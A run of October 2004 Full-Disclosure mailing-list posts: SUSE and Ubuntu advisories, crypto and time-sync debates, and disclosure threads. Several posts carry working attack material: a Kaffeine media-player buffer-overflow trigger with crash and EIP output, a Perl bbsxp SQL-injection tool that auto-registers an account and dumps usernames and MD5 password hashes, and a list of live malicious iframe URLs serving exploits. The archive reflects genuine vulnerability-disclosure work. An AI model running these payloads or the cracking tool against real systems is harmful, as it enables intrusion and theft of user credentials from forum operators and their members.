Re: [security] Re: [Full-Disclosure] FAKE: RedHat: Buffer Overflow in ls and mkdir
On Sun, Oct 24, 2004 at 06:18:41PM -0700, Andrew Farmer wrote: snip I did a quickie analysis of the program (which is basically just distributed as source!). snip when did you get a hold of the tarball? they must've yanked the record for www.fedora-redhat.com ... it can't be resolved in any way. pretty interesting (and pathetic) anyways, nice detective work. -- [ Brett R. Campbell ] - Configuration Management / Systems Administration - Collaborative Agent Design Research Center - California Polytechnic State University, SLO, CA http://www.cadrc.calpoly.edu/frameset_content/content_about_us.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Kaffeine Media Player Conteny Type overflow
Author did not respond and I could not exploit... enjoy.
there will be a proper advisory when I am not being so lazy
-KF
Kaffeine =0.4.2
http://kaffeine.sourceforge.net/download.html
Tested on SuSE Linux 9.1 on source compiled from kaffeine-0.4.3b.tar.bz2
also Tested on various SuSE and Fedora RPMS
On SuSE Linux 9.1 (i586) - Kernel 2.6.5-7.108-default
http://www.suse.com/us/private/download/linuks/i386/update_for_9_1/extra.html
1558f5f4178cc1acbac0a068fb0bf43c kaffeine.rpm
ftp://packman.iu-bremen.de/testing/xine-cvs/kaffeine/
kaffeine-0.5cvs-200409180035.i686.rpm
ftp://packman.iu-bremen.de/suse/9.1/i686/
kaffeine-0.4.3b-0.pm.0.i686.rpm
http://rpm.pbone.net/index.php3/stat/17/dept/5/idg/Productivity_Multimedia_Video_Players
kaffeine-0.4.2-6.i586.rpm
Fedora Core release 2.90 (FC3 Test 1) Kernel 2.6.7-1.478custom on an i686
http://rpmseek.com/rpm-pl/kaffeine.html?hl=comcx=0::
kaffeine-0.4.3-0.lvn.1.b.2.i386.rpm
kaffeine-0.4.3-0.lvn.1.b.1.i386.rpm
This can be triggered via any Real Audio Media - ram playlist file.
kaffeine-0.4.3b/kaffeine/playlist.cpp:
These are your file limitations.
PlayList::LoadRamPlaylist( const KURL kurl, QListViewItem* after)
..
/* check for ram playlist */
if ( (ext == ra) || (ext == rm) || (ext == ram) || (ext == lsc) || (ext
== pl) )
{
...
The overflow occurs here.
kaffeine-0.4.3b/kaffeine/http.c:
static http_t *http_open (const char *mrl) {
http_t *this;
...
if (sscanf(this-buf, Content-Type: %s, mime_type) == 1) {
Sample exploitation.
To cause the exploit modify /etc/mimetypes for the .ram extension make it
A instead of audio/x-pn-realaudio
linux:/srv/www/htdocs # echo `perl -e 'print A x 316 . ABCD'` ram
/etc/mime.types ; /etc/init.d/apache2 restart
Syntax OK
Shutting down httpd2 (waiting for all children to terminate) done
Starting httpd2 (prefork)
[EMAIL PROTECTED] root]# kaffeine http://192.168.1.207/test.pl
http: content length = 30 bytes
http: content type = 'text/plain;'
http: content length = 0 bytes
http: content type =
'ABCD'
[EMAIL PROTECTED] root]# KCrash: Application 'kaffeine' crashing...
create a file named exme.ram in your wwwroot
and create a file named test.pl with the contents:
http://host/exme.ram
Upon reading the test.pl file either via http or via double click kaffeine
will attempt to download the file exme.ram. It will check the mimetype
that the server is offering and procede to copy it into a small buffer.
This can also be exploited by directly viewing the .ram file.
exact eip hit looks like this
gdb) c
Continuing.
http: content length = 30 bytes
http: content type = 'text/plain;'
http: content length = 0 bytes
http: content type =
'ABCD'
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -150400896 (LWP 2328)]
0x080b869c in SubtitleChooser::staticMetaObject ()
(gdb) bt
#0 0x080b869c in SubtitleChooser::staticMetaObject ()
#1 0x5a5a5a5a in ?? ()
#2 0x44434241 in ?? ()
#3 0x097a1200 in ?? ()
#4 0x in ?? ()
#5 0x in ?? ()
#6 0x in ?? ()
#7 0x in ?? ()
#8 0xfef17b28 in ?? ()
#9 0x09794b70 in ?? ()
#10 0x05f04ac0 in kde_malloc_is_used () from /usr/lib/libkdecore.so.4
#11 0x0018 in ?? ()
#12 0x05f04ac0 in kde_malloc_is_used () from /usr/lib/libkdecore.so.4
#13 0x096c3770 in ?? ()
#14 0x096c3760 in ?? ()
#15 0x05f04ac0 in kde_malloc_is_used () from /usr/lib/libkdecore.so.4
#16 0xfef17b48 in ?? ()
#17 0x05ec8dea in malloc () from /usr/lib/libkdecore.so.4
Previous frame inner to this frame (corrupt stack?)
(gdb) i f
Stack level 0, frame at 0xfef17ae0:
eip = 0x80b869c in SubtitleChooser::staticMetaObject(); saved eip
0x5a5a5a5a
called by frame at 0xfef17ae4
Arglist at 0xfef17ad8, args:
Locals at 0xfef17ad8, Previous frame's sp is 0xfef17ae0
Saved registers:
ebp at 0xfef17ad8, eip at 0xfef17adc
0xfeea9b20: 'A' repeats 200 times...
0xfeea9be8: 'A' repeats 116 times, ABCD
Re: [Full-Disclosure] Q: Linux Command Line Encryption
On Mon, Oct 25, 2004 at 08:33:41AM -0700, Denis Dimick wrote: Use GPG and keychain to store the key. I've written a little widget that lets you encrypt a file using another file as the key; I put those things in quotes because it's a dumb little thing that does a quick-and-simple xor of the first file against the other. I realize that this is barely something you'd call encryption, but it might fill your needs. It's called xork and it comes with no warranty whatsoever. http://off.net/~mhoye/xork/ If anyone who is smarter than I am would like to suggest anything, I'd be glad to hear it. - Mike Hoye -- Theology is the effort to explain the unknowable in terms of the not worth knowing. - H. L. Mencken ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] PTms04-030
PTms04-030 - tool for checking WebDAV XML DoS vulnerability. More information and download: http://www.securitylab.ru/tools/48998.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] FAKE: RedHat: Buffer Overflow in ls and mkdir
snip from the ISC's SANS The k-otik folks have an analysis of the bad things that might happen if you follow the instructions in the fake RedHat advisory that was reported in yesterday's diary: http://www.k-otik.com/news/FakeRedhatPatchAnalysis.txt snip the source code is also there Steph --- Brett Campbell [EMAIL PROTECTED] wrote: On Sun, Oct 24, 2004 at 06:18:41PM -0700, Andrew Farmer wrote: snip I did a quickie analysis of the program (which is basically just distributed as source!). snip when did you get a hold of the tarball? they must've yanked the record for www.fedora-redhat.com ... it can't be resolved in any way. pretty interesting (and pathetic) anyways, nice detective work. -- [ Brett R. Campbell ] - Configuration Management / Systems Administration - Collaborative Agent Design Research Center - California Polytechnic State University, SLO, CA __ Do you Yahoo!? Yahoo! Mail Address AutoComplete - You start. We finish. http://promotions.yahoo.com/new_mail ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] SUSE Security Announcement: xpdf, gpdf, kpdf, pdftohtml, cups (SUSE-SA:2004:039)
-BEGIN PGP SIGNED MESSAGE- __ SUSE Security Announcement Package:xpdf, gpdf, kdegraphics3-pdf, pdftohtml, cups Announcement-ID:SUSE-SA:2004:039 Date: Tuesday, Oct 26th 2004 10:30 MEST Affected products: 8.1, 8.2, 9.0, 9.1, 9.2 SUSE Linux Enterprise Server 8, 9 SUSE Linux Desktop 1.0 Vulnerability Type: remote system compromise Severity (1-10):5 SUSE default package: yes Cross References: CAN-2004-0888 CAN-2004-0889 Content of this advisory: 1) security vulnerability resolved: - integer overflows - arithmetic errors problem description 2) solution/workaround 3) special instructions and notes 4) package location and checksums 5) pending vulnerabilities, solutions, workarounds: - freeradius denial of service problems - mpg123 - squid 6) standard appendix (further information) __ 1) problem description, brief discussion Xpdf is a widely used fast PDF file viewer. Various other PDF viewer and PDF conversion tools use xpdf code to accomplish their tasks. Chris Evans found several integer overflows and arithmetic errors. Additionally Sebastian Krahmer from the SuSE Security-Team found similar bugs in xpdf 3. These bugs can be exploited by tricking an user to open a malformated PDF file. As a result the PDF viewer can be crashed or may be even code can be executed. 2) solution/workaround Due to the wide usage of xpdf-based code we do not recommend switching to another PDF viewer as a workaround. You have to install the updates. 3) special instructions and notes Please restart all running instances of xpdf, gpdf, kpdf, pdftohtml, cups after updating successfully. 4) package location and checksums Please download the update package for your distribution and verify its integrity by the methods listed in section 3) of this announcement. Then, install the package using the command rpm -Fhv file.rpm to apply the update. Our maintenance customers are being notified individually. The packages are being offered to install from the maintenance web. Cups packages and all 9.2 packages will be available later. x86 Platform: SUSE Linux 9.1: ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/pdftohtml-0.36-112.3.i586.rpm f17866987c9099ed8b0395d184adfffc ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/xpdf-3.00-64.21.i586.rpm d648d6e96013cc339dd424041f8bc973 ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/gpdf-0.112.1-26.3.i586.rpm 16864a7b7652a3183f9f8cac034cf70e ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kdegraphics3-pdf-3.2.1-67.6.i586.rpm 8f09aa7927d9cdcfc52ab06e520b2441 patch rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/pdftohtml-0.36-112.3.i586.patch.rpm 2d3da1271fc9e072186fca6aa1de8c5c ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/xpdf-3.00-64.21.i586.patch.rpm 093d0aaa7f4fbe24afc722057cbe334e ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/gpdf-0.112.1-26.3.i586.patch.rpm 3af8141ddfbdf558afdf4f2f8f94a9f8 ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kdegraphics3-pdf-3.2.1-67.6.i586.patch.rpm 0d765c907e89a91186e03d8c8de87857 source rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/pdftohtml-0.36-112.3.src.rpm d4892578f2d84c1bdbc36b0df9341607 ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/xpdf-3.00-64.21.src.rpm d4c06775143e5e6fec7bc544d248daee ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/gpdf-0.112.1-26.3.src.rpm cfda8ff6f352e1bc4f827a3118521b25 ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/kdegraphics3-3.2.1-67.6.src.rpm bb4d96dd72f0ee94315afd7b4c81e16b SUSE Linux 9.0: ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/pdftohtml-0.36-118.i586.rpm dc822cef09e27e169acd94cda1fb622a ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/xpdf-2.02pl1-141.i586.rpm c99912bc5656546b028a8c4fe0473a75 patch rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/pdftohtml-0.36-118.i586.patch.rpm 58b8a44ae02482d19c73959bfd85e85e ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/xpdf-2.02pl1-141.i586.patch.rpm 8055fbed4ac1e664706701e3b7d3e1bc source rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/pdftohtml-0.36-118.src.rpm 35e37ded2db7d772d854748e606f42d0
RE: [Full-Disclosure] Windows Time Synchronization - Best Practices
-Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of Andrew Farmer Sent: 25 October 2004 20:22 To: Gary E. Miller Cc: Micheal Espinola Jr; [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Windows Time Synchronization - Best Practices On 24 Oct 2004, at 18:48, Gary E. Miller wrote: On Fri, 22 Oct 2004, Micheal Espinola Jr wrote: You can certainly have multiple time servers specified with Windows Time Service (SNTP). RTM. It has the ability to failover through a list. Yes you can have multiple time servers, but only one active at a time. With NTP your client polls a number of diverse servers. Routes can flap, servers can go wacko, but your time stays solid. The canonical *NIX ntp client supports multiple active servers, if that's what you're talking about. No idea about Windows, though. Getting back to the poster's original question, Windows is really bad for time synchronisation. Whereas you can set an NTP server to UTC/GMT/ZULU (or whatever other name you are going to call it), Windows does indeed move the clock forward and backward. We've experienced this difficulty ourselves where you log in to a server which then puts the clock an hour forward and then Windows itself puts the clock an hour forward. The end result is that the clock is wrong. Local time should simply be calculated as an offset from UTC. So instead of changing the clock, change the time zone. Then it won't matter if the time zone is changed to BST (for example) more than once. The clock and the offset will stay the same. Note to Microsoft - fix this stupidity in your next version of Windows. It will annoy your users to begin with, but a number of time synch issues will be solved in one fell swoop. All the three letter codes are publicly available and understood by your end users. -- John Airey, BSc (Jt Hons), CNA, RHCE Internet systems support officer, ITCSD, Royal National Institute of the Blind, Bakewell Road, Peterborough PE2 6XU, Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 [EMAIL PROTECTED] Even if Embryonic Stem Cell Research yielded medical treatments, how could enough eggs be obtained to make them viable? We can't even get enough organs for transplant donation. -- DISCLAIMER: NOTICE: The information contained in this email and any attachments is confidential and may be privileged. If you are not the intended recipient you should not use, disclose, distribute or copy any of the content of it or of any attachment; you are requested to notify the sender immediately of your receipt of the email and then to delete it and any attachments from your system. RNIB endeavours to ensure that emails and any attachments generated by its staff are free from viruses or other contaminants. However, it cannot accept any responsibility for any such which are transmitted. We therefore recommend you scan all attachments. Please note that the statements and views expressed in this email and any attachments are those of the author and do not necessarily represent those of RNIB. RNIB Registered Charity Number: 226227 Website: http://www.rnib.org.uk ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Q: Linux Command Line Encryption
Thanks to everyone who replied to this, I appreciate your time. This issue has now been dealt with. Ali ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Possibly a stupid question RPC over HTTP
-Original Message- From: Kyle Maxwell [mailto:[EMAIL PROTECTED] Sent: 25 October 2004 04:30 To: Airey, John Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Possibly a stupid question RPC over HTTP [snip] You're talking about solving a problem that DOESN'T EXIST BY DEFINITION. Re-read my response -- this time without being stupid -- and you'll see that I was trying to explain to you that the problem is the general factoring of large numbers (into primes for what should be obvious reasons). This is NOT the same as factoring large primes as that's a solved problem. If this is still difficult to understand, any handy grade-school maths book should provide additional explanation. Testing for primality, which is a related but different problem, is solved, but proving that a number is composite is unfortunately not the same as knowing its factors. /flame As to the question of whether this is a solved problem: we may have to agree to disagree; if it were the NSA, given their past interactions with the crypto community, I think it likely that they'd have over time moved to another type of cryptography. BTW, brute forcing a key does not break the system -- and as others have shown in this thread, it's impossible to precompute all the keys unless you've broken every single PRNG out there, and that's even less likely. What is it with this list that people can't reply without being rude? Is it the phase of the moon or something? OK, so we can rule out brute force, as storing every prime that's possible with 512bit keys isn't possible in this universe. Anyway, to quote RSA Laboratories: The RSA algorithm works as follows: take two large primes, p and q, and compute their product n = pq; n is called the modulus. Choose a number, e, less than n and relatively prime to (p-1)(q-1), which means e and (p-1)(q-1) have no common factors except 1. Find another number d such that (ed - 1) is divisible by (p-1)(q-1). The values e and d are called the public and private exponents, respectively. The public key is the pair (n, e); the private key is (n, d). The factors p and q may be destroyed or kept with the private key. It is currently difficult to obtain the private key d from the public key (n, e). However if one could factor n into p and q, then one could obtain the private key d. Thus the security of the RSA system is based on the assumption that factoring is difficult (http://www.rsasecurity.com/rsalabs/node.asp?id=2214) Therefore my point still stands that if someone does possess a mathematical solution to the above, then all bets are off. (Whoever it was who disagreed about my statements on encryption, please remember the context of the thread is about SSL security, not one-time keys). Getting back to the original question, you can't discover if someone is sending RPC over https unless you have a solution to the RSA hard problem above. Nor is it a major security issue if someone is using RPC over https either, unless there are flaws in the implementation of SSL or RPC that could be exploited by someone else. This is my last post on the matter which is solely for the purpose of making at least one post in this thread sensible and useful for future readers of the archive. All future abusive emails on my mathematical abilities will be deleted without response. -- John Airey, BSc (Jt Hons), CNA, RHCE Internet systems support officer, ITCSD, Royal National Institute of the Blind, Bakewell Road, Peterborough PE2 6XU, Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 [EMAIL PROTECTED] Tag line temporarily removed due to several people being unable and/or unwilling to comprehend what I'm talking about. -- DISCLAIMER: NOTICE: The information contained in this email and any attachments is confidential and may be privileged. If you are not the intended recipient you should not use, disclose, distribute or copy any of the content of it or of any attachment; you are requested to notify the sender immediately of your receipt of the email and then to delete it and any attachments from your system. RNIB endeavours to ensure that emails and any attachments generated by its staff are free from viruses or other contaminants. However, it cannot accept any responsibility for any such which are transmitted. We therefore recommend you scan all attachments. Please note that the statements and views expressed in this email and any attachments are those of the author and do not necessarily represent those of RNIB. RNIB Registered Charity Number: 226227 Website: http://www.rnib.org.uk ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Presentation / Paper : Demystifying Penetration Testing
Hi All, This is to announce the release of a presentation / paper on PenTesting by HACKINGSPIRITS called Demystifying Penetration Testing. It is mostly targeted for those who are new to Penetration Testing (i.e. Security Officers / Sys Admins / Security Auditors / Security Enthusiasts.etc). This presentation will give a clear picture on how pen testing is done and what are the expected results. Various screenshots are provided as a proof of concepts to give a brief picture of possible end-results. The goals of this presentation / paper are as follows: - An overview of how Vulnerability Assessment (VA) Penetration Testing (PT) is done - Defining scope of the assessment - Types of Penetration Testing - A brief understanding on how Buffer Overflow works - How vulnerabilities are scanned and exploited - What are the end results - What a Penetration Testing Report should contain It can be downloaded from the following link: http://www.hackingspirits.com/eth-hac/papers/whitepapers.asp Debasis Mohanty www.hackingspirits.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
SV: [Full-Disclosure] Rendering binary file as HTML makes Mozilla Firefox stop responding or crash
Hi Bipin, It's not rated as a serious risk, is it? Simply a DoS. This is not sorely related to trivial memory consumption, neither. The scenario you're descriping has been around for ages and is related to system resources. This is not. Regards Peter Kruse -Oprindelig meddelelse- Fra: bipin gautam [mailto:[EMAIL PROTECTED] Sendt: 26. oktober 2004 19:09 Til: [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Emne: Re: [Full-Disclosure] Rendering binary file as HTML makes Mozilla Firefox stop responding or crash ya i've been seeing this behavior since a long time... but i don't think there is anything serious. Firefox only slows down (using 100% cpu) if you are using a slow PC. And after the binary file have been completed loded. Everything works normal.. frankly, there are lot of such similar bugs. If you open multiple windows and multiple tabs at once, firefox locks/reservs the memory (pagefile) that its using even when some of the tabs are closed. You have to restart mozilla (close all the open windows) to free the memory. huh, nothing serious isn't it.. bipin __ Do you Yahoo!? Yahoo! Mail Address AutoComplete - You start. We finish. http://promotions.yahoo.com/new_mail ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Rendering binary file as HTML makes Mozilla Firefox stop responding or crash
ya i've been seeing this behavior since a long time... but i don't think there is anything serious. Firefox only slows down (using 100% cpu) if you are using a slow PC. And after the binary file have been completed loded. Everything works normal.. frankly, there are lot of such similar bugs. If you open multiple windows and multiple tabs at once, firefox locks/reservs the memory (pagefile) that its using even when some of the tabs are closed. You have to restart mozilla (close all the open windows) to free the memory. huh, nothing serious isn't it.. bipin __ Do you Yahoo!? Yahoo! Mail Address AutoComplete - You start. We finish. http://promotions.yahoo.com/new_mail ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Multiple AV DoS (part v)
Finally, Most, AV softwares seem to handle ZIP ARCHIVE BOMB easily. Lately, i was impressed with Mcafee Antivirus But what a pitty, still many AV dies (DoS) while scanning compressed oversized execudables. http://www.geocities.com/visitbipin/oversize_exe.zip Currently I know, Norton AV 2002/2003/2004 pro. McAfee 4396 Sybari 7.5.1314 TrendMicro 7.000 SHOULD BE vulnerable to this bug. I also confirmed it using www.virustotal.com WHAT A PITTY. I wonder, when will AV softwares improve... bipin gautam http://www.geocities.com/visitbipin __ Do you Yahoo!? Take Yahoo! Mail with you! Get it on your mobile phone. http://mobile.yahoo.com/maildemo ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Php Nuke Hack's
Hi, i'm a spanish reader and.. y will try expose myself.. I need hack one site created of mysefl with php-nuke. This site is hosted in my computed to test the security of Php Nuke. I receantly use some hack's like SQL Inyection, Cross-Site Scripting and cookie ¿kidnapping? (this last one without good results...) I use the hack's that i found in http://packetstorm.security-guide.de/assess/ ... ¿Anyone can write or send more hack's? Thanks ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Php Nuke Hack's
Please don't expose yourself. This is all I got for you. http://www.milw0rm.com/search.php?dong=php-nuke On Tue, 26 Oct 2004 20:18:51 +0200, .:: DarkDelphi ::. [EMAIL PROTECTED] wrote: Hi, i'm a spanish reader and.. y will try expose myself.. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Php Nuke Hack's
ever consider writing one yourself? - Original Message - From: [EMAIL PROTECTED] To: [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Sent: Tuesday, October 26, 2004 3:29 PM Subject: [Full-Disclosure] Php Nuke Hack's Please don't expose yourself. This is all I got for you. http://www.milw0rm.com/search.php?dong=php-nuke On Tue, 26 Oct 2004 20:18:51 +0200, .:: DarkDelphi ::. [EMAIL PROTECTED] wrote: Hi, i'm a spanish reader and.. y will try expose myself.. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Php Nuke Hack's
Please don't expose yourself.
This is all I got for you.
http://www.milw0rm.com/search.php?dong=php-nuke
That is not very cool. See my crack tool for bbsxp forum. It works
well on 5.00, 4.0beta3 and beta4.Your crack crack just like watch
moive. It will register user and get the password for you
automatically. ;)
--
Thanks
bugfree
#!/usr/bin/perl
#
# This tool is used to crack bbsxp 5.00(access, MSSQL)
# Deveoped by bugfree ( www.xx.org )
# Thanks theAres for his help on debuging
#
use IO::Socket;
use Getopt::Std;
use HTTP::Request::Common;
use HTTP::Cookies;
use LWP;
use LWP::UserAgent;
use HTML::Form;
$version='1.0';
#$username = 'test';
#$password = 'testt';
$namepass = 'test:test';
$username2 = 'zgtqwpmz123';
$password2 = 'gbhnjm';
$fLoginFail = 0;
$fRegistFail =0;
%options=();
getopts(h:u:,\%options);
(defined $options{h} ) || die Usage(version: . $version . ):
$0\n\t-h www.abc.com/bbs/\n\t-u username:password\n;
$tmpUrl = $options{h} if defined $options{h};
$namepass = $options{u} if defined $options{u};
@str = split(:, $namepass);
$username = $str[0];
$password = $str[1];
if ( $tmpUrl =~ /(http:\/\/)?([a-z0-9.]+)\/(.*)/i ) {
$webhost = $2;
$webdir = $3;
$webUrl = $webhost . '/' . $webdir .'/';
$webUrl =~ s/\/\//\//;
$webUrl = 'http://' . $webUrl;
}
else {
die Please use format: -h http://www.target.com/bbs/;;
}
print SQL injection for URL: $webUrl \n;
#Global URL
my $loginPage = $webUrl . 'login.asp';
my $searchPage = $webUrl . 'search.asp';
my $registPage = $webUrl . 'register.asp';
my $cookies = HTTP::Cookies-new();
my $ua = LWP::UserAgent-new;
$ua-cookie_jar( $cookies );
#loginRegist();
webLogin( $username, $password );
if ( $fLoginFail == 1 ) {
loginRegist( $username2, $password2 ); #try 2nd user
if ( $fRegistFail == 1 ) {
$fLoginFail = 0;
webLogin( $username2, $password2 );
if ( $fLoginFail == 1 ) { die Sorry, Can not login to web \n; }
}
}
#sql injection
webSearch();
##
# Functions list
# loginRegist() :register to bbs
# webLogin() : web login
# webSearch() : web login
##
sub webSearch
{
#injection SQL, Leave a space in the end
$searchxm = 'forumid=0 union all SELECT 1, forum.forumid,
user.userpass, user.username, forum.content, forum.posttime,
forum.postip, forum.replies, forum.Views, forum.icon, forum.goodtopic,
forum.toptopic, forum.locktopic, forum.deltopic, forum.lastname,
forum.lasttime, clubconfig.adminpassword, forum.pollresult ,
forum.multiplicity FROM [user],forum, clubconfig where user.membercode
3 OR user.username ';
$request = POST ( $searchPage . '?menu=ok' ,
[
content = 'abcd',
search = 'author',
searchxm = $searchxm,
searchxm2 = 'topic',
TimeLimit = '1',
forumid =''
],
Referer = $searchPage,
Connection = 'Keep-Alive',
User-Agent = 'Mozilla/4.0',
Host = $webhost
);
$response = $ua-request( $request );
if ( $response-as_string =~ /HTTP\/1.[01] 200/ )
{
print search Success\n;
%passwdGet = ();
@htmlOut= split(\n,$response-as_string);
foreach $v (@htmlOut)
{
if ( $v =~
/scriptShowForum\(\d+,([A-Z0-9]{32,32}),.*?,(.*?),.*\/script/
)
{
$passwdGet{$1}=$2;
#print \tUsername: $2\n\tMD5 passwd: $1 . \n;
}
}
while ( my ( $key, $value ) = each %passwdGet )
{
print \tusername: $value\n\tMD5 passwd: $key\n;
}
}
else
{
print $response-as_string. \n;
die search Failed\n;
}
}
sub loginRegist
{
$myusername = $_[0];
$mypassword = $_[1];
$request = POST ( $registPage,
[
username = $myusername,
password = $mypassword,
userpass2 = $mypassword,
usermail = '[EMAIL PROTECTED]',
realname = 'baby',
userface = 'images/face70.gif',
birthday = '',
perlsonal = '',
sign = '',
sex = '',
country = '',
province = '',
city = '',
blood = '',
belief = '',
occupation = '',
marital = '',
education = '',
college = '',
userqq = '',
icq = '',
Re: [Full-Disclosure] xpire.info splitinfinity.info - exploits in the wild
Finally, I clean the compromised box of my friend :)) I've found (following many helpful suggestions of people in FD list) that a variant of suckit rootkit was installed on this machine. The strange thing is that rkhunter and chkrootkit don't catch it : in any way and they said that everything is ok. To found suckit and deactivate it I used this : http://tsd.student.utwente.nl/skdetect/ It's a code based on suckit source code, but without the malware part. It can dig into /dev/kmem and explores sys_call_table[]; skdetect was able to found suckit installed. Another person who was compromised by the xpire.info hacker said to me that the symptoms were the same and also in his host he found this suckit variant installed. suckit version 'Q' DETECTED kernel-part uninstall seems successful. After reboot everything come back to normal activity. Thank you to everyone for the answers given to me (Ron DuFresne, Nick FitzGerald, Kevin and others). Actually on xpire.info/fa/?d=get malware page you can found this exploits in the wild : #IFRAME SRC=http://www.sp2fucked.biz/user28/counter.htm; WIDTH=0 BORDER=0 HEIGHT=0/IFRAME# #iframe src=http://xpire.info/fa/t3.htm; width=1 height=1/iframe# #iframe src=http://xpire.info/fa/x.htm; width=1 height=1/iframe# #iframe src=http://xpire.info/fa/proc.htm; width=1 height=1/iframe# #iframe src=http://xpire.info/fa/runevil.htm; width=1 height=1/iframe# #iframe src=http://213.159.117.133/dl/adv121.php; width=1 height=1/iframe# !-- #IFRAME SRC=http://x.full-tgp.net/?fox.com; WIDTH=1 HEIGHT=1/IFRAME# //-- There a lot of backdoor/trojan ready-to-install and the bad news is that most of this malware are recompiled, so many AV are fooled and don't catch them (for example Symantec and ClamAV don' recognize many malware in this site, after a quick test made with www.virustotal.com) Bye, EF ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] [USN-7-1] imagemagick vulnerability
=== Ubuntu Security Notice USN-7-1 October 27, 2004 imagemagick vulnerability CAN-2004-0981 === A security issue affects the following Ubuntu releases: Ubuntu 4.10 (Warty Warthog) The following packages are affected: libmagick6 The problem can be corrected by upgrading the affected package to version 5:6.0.2.5-1ubuntu1.1. In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: A buffer overflow in imagemagick's EXIF parsing routine has been discovered in imagemagick versions prior to 6.1.0. Trying to query EXIF information of a malicious image file might result in execution of arbitrary code with the user's privileges. Since imagemagick can be used in custom printing systems, this also might lead to privilege escalation (execute code with the printer spooler's privileges). However, Ubuntu's standard printing system does not use imagemagick, thus there is no risk of privilege escalation in a standard installation. Source archives: http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.0.2.5-1ubuntu1.1.diff.gz Size/MD5: 128252 ec2de08007787f6dceb8048fa381c269 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.0.2.5-1ubuntu1.1.dsc Size/MD5: 874 fbd1bde2b883b5e1f6d3c3608baf97f2 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.0.2.5.orig.tar.gz Size/MD5: 6700454 207fdb75b6c106007cc483cf15e619ad amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.0.2.5-1ubuntu1.1_amd64.deb Size/MD5: 1365882 4a7e2a576a514058945e26a1fbfbaf61 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++6-dev_6.0.2.5-1ubuntu1.1_amd64.deb Size/MD5: 226096 8a0cb4adfa863f7917494539793cad37 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++6_6.0.2.5-1ubuntu1.1_amd64.deb Size/MD5: 160490 58a31d1a58a09e11135d6864afe07dd6 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick6-dev_6.0.2.5-1ubuntu1.1_amd64.deb Size/MD5: 1518994 1e261e47415a33e272c906c69b72be9f http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick6_6.0.2.5-1ubuntu1.1_amd64.deb Size/MD5: 1166704 334a3099dce3e9ca8aa5b450452339a9 http://security.ubuntu.com/ubuntu/pool/universe/i/imagemagick/perlmagick_6.0.2.5-1ubuntu1.1_amd64.deb Size/MD5: 138348 9e58147cb448c7cb74916f5ff5638c52 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.0.2.5-1ubuntu1.1_i386.deb Size/MD5: 1365782 da2ebba8bac45b8fb83033aa7d530c57 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++6-dev_6.0.2.5-1ubuntu1.1_i386.deb Size/MD5: 206254 9f762b26048e7ad4dc208834f6d77312 